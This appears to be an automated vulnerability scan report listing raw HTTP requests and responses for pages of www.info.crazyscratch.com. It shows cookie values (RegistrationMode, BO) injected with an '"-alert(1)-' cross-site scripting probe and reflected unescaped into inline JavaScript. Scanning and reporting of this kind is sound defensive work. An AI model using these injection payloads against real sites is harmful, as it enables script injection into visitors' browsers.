HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 11:51:22 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM; domain=info.crazyscratch Set-Cookie: BO=FM6c555"-alert(1)- Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch Set-Cookie: CountryCode=US; domain=info.crazyscratch Set-Cookie: CSITemp=28; domain=info.crazyscratch Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 62159 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... / ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM"; var strBonusOption = "FM6c555"-alert(1)- // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat strRegistra ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.info |
Path: | /ContactUsMail.aspx |
GET /ContactUsMail.aspx HTTP/1.1 Host: www.info.crazyscratch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A/ |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 11:50:43 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM719df" Set-Cookie: BO=FM; domain=info.crazyscratch Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch Set-Cookie: CountryCode=US; domain=info.crazyscratch Set-Cookie: CSITemp=28; domain=info.crazyscratch Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 62159 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... nMode, pBonusOption) { // ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM719df"-alert(1)- var strBonusOption = "FM"; // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.info |
Path: | /ContactUsTel.aspx |
GET /ContactUsTel.aspx HTTP/1.1 Host: www.info.crazyscratch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A/ |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 11:51:39 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM; domain=info.crazyscratch Set-Cookie: BO=FM5421a"-alert(1)- Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch Set-Cookie: CountryCode=US; domain=info.crazyscratch Set-Cookie: CSITemp=28; domain=info.crazyscratch Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 54496 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... / ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM"; var strBonusOption = "FM5421a"-alert(1)- // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat strRegistra ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.info |
Path: | /ContactUsTel.aspx |
GET /ContactUsTel.aspx HTTP/1.1 Host: www.info.crazyscratch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A/ |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 11:51:00 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM9a73f" Set-Cookie: BO=FM; domain=info.crazyscratch Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch Set-Cookie: CountryCode=US; domain=info.crazyscratch Set-Cookie: CSITemp=28; domain=info.crazyscratch Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 54496 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... nMode, pBonusOption) { // ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM9a73f"-alert(1)- var strBonusOption = "FM"; // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.info |
Path: | /FairPlay.aspx |
GET /FairPlay.aspx HTTP/1.1 Host: www.info.crazyscratch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A/ |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 11:52:02 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM; domain=info.crazyscratch Set-Cookie: BO=FMdafa7"-alert(1)- Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch Set-Cookie: CountryCode=US; domain=info.crazyscratch Set-Cookie: CSITemp=28; domain=info.crazyscratch Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 56312 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... / ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM"; var strBonusOption = "FMdafa7"-alert(1)- // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat strRegistra ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.info |
Path: | /FairPlay.aspx |
GET /FairPlay.aspx HTTP/1.1 Host: www.info.crazyscratch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A/ |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 11:51:26 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PMbf00e" Set-Cookie: BO=FM; domain=info.crazyscratch Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch Set-Cookie: CountryCode=US; domain=info.crazyscratch Set-Cookie: CSITemp=28; domain=info.crazyscratch Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 56312 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... nMode, pBonusOption) { // ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PMbf00e"-alert(1)- var strBonusOption = "FM"; // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.info |
Path: | /Help.aspx |
GET /Help.aspx HTTP/1.1 Host: www.info.crazyscratch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A/ |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 11:51:02 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM; domain=info.crazyscratch Set-Cookie: BO=FM89770"-alert(1)- Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch Set-Cookie: CountryCode=US; domain=info.crazyscratch Set-Cookie: CSITemp=28; domain=info.crazyscratch Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 55561 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... / ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM"; var strBonusOption = "FM89770"-alert(1)- // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat strRegistra ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.info |
Path: | /Help.aspx |
GET /Help.aspx HTTP/1.1 Host: www.info.crazyscratch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A/ |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 11:50:26 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM1019c" Set-Cookie: BO=FM; domain=info.crazyscratch Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch Set-Cookie: CountryCode=US; domain=info.crazyscratch Set-Cookie: CSITemp=28; domain=info.crazyscratch Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 55561 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... nMode, pBonusOption) { // ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM1019c"-alert(1)- var strBonusOption = "FM"; // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.info |
Path: | /InviteFriend.aspx |
GET /InviteFriend.aspx HTTP/1.1 Host: www.info.crazyscratch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A/ |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 11:50:44 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM; domain=info.crazyscratch Set-Cookie: BO=FMf9722"-alert(1)- Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch Set-Cookie: CountryCode=US; domain=info.crazyscratch Set-Cookie: CSITemp=28; domain=info.crazyscratch Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 66940 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... / ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM"; var strBonusOption = "FMf9722"-alert(1)- // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat strRegistra ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.info |
Path: | /InviteFriend.aspx |
GET /InviteFriend.aspx HTTP/1.1 Host: www.info.crazyscratch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A/ |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 11:50:03 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM5a78c" Set-Cookie: BO=FM; domain=info.crazyscratch Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch Set-Cookie: CountryCode=US; domain=info.crazyscratch Set-Cookie: CSITemp=28; domain=info.crazyscratch Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 66941 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... nMode, pBonusOption) { // ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM5a78c"-alert(1)- var strBonusOption = "FM"; // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.info |
Path: | /PlayersClub.aspx |
GET /PlayersClub.aspx HTTP/1.1 Host: www.info.crazyscratch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A/ |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 11:50:55 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM; domain=info.crazyscratch Set-Cookie: BO=FM24ff3"-alert(1)- Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch Set-Cookie: CountryCode=US; domain=info.crazyscratch Set-Cookie: CSITemp=28; domain=info.crazyscratch Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 63410 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... / ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM"; var strBonusOption = "FM24ff3"-alert(1)- // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat strRegistra ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.info |
Path: | /PlayersClub.aspx |
GET /PlayersClub.aspx HTTP/1.1 Host: www.info.crazyscratch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A/ |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 11:50:17 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PMed195" Set-Cookie: BO=FM; domain=info.crazyscratch Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch Set-Cookie: CountryCode=US; domain=info.crazyscratch Set-Cookie: CSITemp=28; domain=info.crazyscratch Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 63410 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... nMode, pBonusOption) { // ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PMed195"-alert(1)- var strBonusOption = "FM"; // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.info |
Path: | /Privacy.aspx |
GET /Privacy.aspx HTTP/1.1 Host: www.info.crazyscratch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A/ |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 11:51:43 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM; domain=info.crazyscratch Set-Cookie: BO=FM73f57"-alert(1)- Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch Set-Cookie: CountryCode=US; domain=info.crazyscratch Set-Cookie: CSITemp=28; domain=info.crazyscratch Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 65555 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... / ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM"; var strBonusOption = "FM73f57"-alert(1)- // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat strRegistra ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.info |
Path: | /Privacy.aspx |
GET /Privacy.aspx HTTP/1.1 Host: www.info.crazyscratch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A/ |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 11:51:07 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM4bcf6" Set-Cookie: BO=FM; domain=info.crazyscratch Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch Set-Cookie: CountryCode=US; domain=info.crazyscratch Set-Cookie: CSITemp=28; domain=info.crazyscratch Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 65555 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... nMode, pBonusOption) { // ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM4bcf6"-alert(1)- var strBonusOption = "FM"; // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.info |
Path: | /Promotions.aspx |
GET /Promotions.aspx HTTP/1.1 Host: www.info.crazyscratch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A/ |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 11:50:41 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM; domain=info.crazyscratch Set-Cookie: BO=FMb98d2"-alert(1)- Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch Set-Cookie: CountryCode=US; domain=info.crazyscratch Set-Cookie: CSITemp=28; domain=info.crazyscratch Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 57710 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... / ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM"; var strBonusOption = "FMb98d2"-alert(1)- // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat strRegistra ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.info |
Path: | /Promotions.aspx |
GET /Promotions.aspx HTTP/1.1 Host: www.info.crazyscratch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A/ |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 11:50:03 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM8d21f" Set-Cookie: BO=FM; domain=info.crazyscratch Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch Set-Cookie: CountryCode=US; domain=info.crazyscratch Set-Cookie: CSITemp=28; domain=info.crazyscratch Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 57710 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... nMode, pBonusOption) { // ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM8d21f"-alert(1)- var strBonusOption = "FM"; // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.info |
Path: | /Responsible.aspx |
GET /Responsible.aspx HTTP/1.1 Host: www.info.crazyscratch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A/ |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 11:51:57 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM; domain=info.crazyscratch Set-Cookie: BO=FMac727"-alert(1)- Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch Set-Cookie: CountryCode=US; domain=info.crazyscratch Set-Cookie: CSITemp=28; domain=info.crazyscratch Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 61117 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... / ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM"; var strBonusOption = "FMac727"-alert(1)- // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat strRegistra ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.info |
Path: | /Responsible.aspx |
GET /Responsible.aspx HTTP/1.1 Host: www.info.crazyscratch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A/ |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 11:51:21 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM5a641" Set-Cookie: BO=FM; domain=info.crazyscratch Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch Set-Cookie: CountryCode=US; domain=info.crazyscratch Set-Cookie: CSITemp=28; domain=info.crazyscratch Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 61117 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... nMode, pBonusOption) { // ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM5a641"-alert(1)- var strBonusOption = "FM"; // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.info |
Path: | /Terms.aspx |
GET /Terms.aspx HTTP/1.1 Host: www.info.crazyscratch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A/ |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 11:52:37 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM; domain=info.crazyscratch Set-Cookie: BO=FM7e7cf"-alert(1)- Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch Set-Cookie: CountryCode=US; domain=info.crazyscratch Set-Cookie: CSITemp=28; domain=info.crazyscratch Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 117971 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... / ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM"; var strBonusOption = "FM7e7cf"-alert(1)- // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat strRegistra ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.info |
Path: | /Terms.aspx |
GET /Terms.aspx HTTP/1.1 Host: www.info.crazyscratch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A/ |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 11:51:51 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM7ee3a" Set-Cookie: BO=FM; domain=info.crazyscratch Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch Set-Cookie: CountryCode=US; domain=info.crazyscratch Set-Cookie: CSITemp=28; domain=info.crazyscratch Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 117971 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... nMode, pBonusOption) { // ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM7ee3a"-alert(1)- var strBonusOption = "FM"; // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.info |
Path: | /UnderAge.aspx |
GET /UnderAge.aspx HTTP/1.1 Host: www.info.crazyscratch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A/ |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 11:52:16 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM; domain=info.crazyscratch Set-Cookie: BO=FM80420"-alert(1)- Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch Set-Cookie: CountryCode=US; domain=info.crazyscratch Set-Cookie: CSITemp=28; domain=info.crazyscratch Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 54287 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... / ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM"; var strBonusOption = "FM80420"-alert(1)- // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat strRegistra ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.info |
Path: | /UnderAge.aspx |
